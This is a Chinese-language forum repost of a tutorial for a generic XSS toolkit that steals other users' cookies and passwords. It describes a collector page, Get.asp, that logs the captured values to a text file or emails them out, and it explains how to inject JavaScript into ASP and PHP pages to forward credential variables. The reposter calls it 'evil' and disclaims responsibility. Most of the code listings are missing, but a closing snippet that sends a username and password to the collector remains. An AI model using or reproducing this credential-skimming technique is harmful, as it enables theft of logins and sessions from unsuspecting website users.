”XSS/偷取密码/Cookies通用脚本

【白银时代】备注：这东西貌似比较邪恶的说，出了事别来找我，直接找原作者……

来源：http://www.5luyu.cn/article/605.htm

很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。
今天写个通用脚本工具
文件如下

asp.asp或者php.php 或者cookies.htm效果如下
保存文本
 

发送邮件

获取的cookies

截获用户名密码

主文件Get.asp用来获取发来的信息,并且保存到 TXT或者发送到邮箱
内容如下: 使用方法：
asp.asp是Asp中调用Get.asp的例子内容如下
即在存在需要获取的变量的地方添加如下JS代码即可
通常在页面最下面添加即可。因为变量一般赋值后都不会清空。
如果在asp脚本中间需要添加JS则需要先闭合语句 php.php是PHP中使用例子。代码如下: cookies.htm是用来获取Cookies的例子
代码如下: 有任何问题和意见跟帖。。。
另外。
所有的参数可以自己添加。你可以Get.asp?a=abc&b=abc&c=abcZ&…多少个变量都行…Get.asp?账号=abc&密码=abc这样也可以
具体自己用用就明白了。
需要深入处理Cookies的自己根据实际情况调整吧。。
这只是一个通用的。方便例子。呼呼。

<%username="admin"password="admin888"%><script src="get.asp?username=<%=username%>&password=<%=password%>" /><%response.write Response.Cookies()%>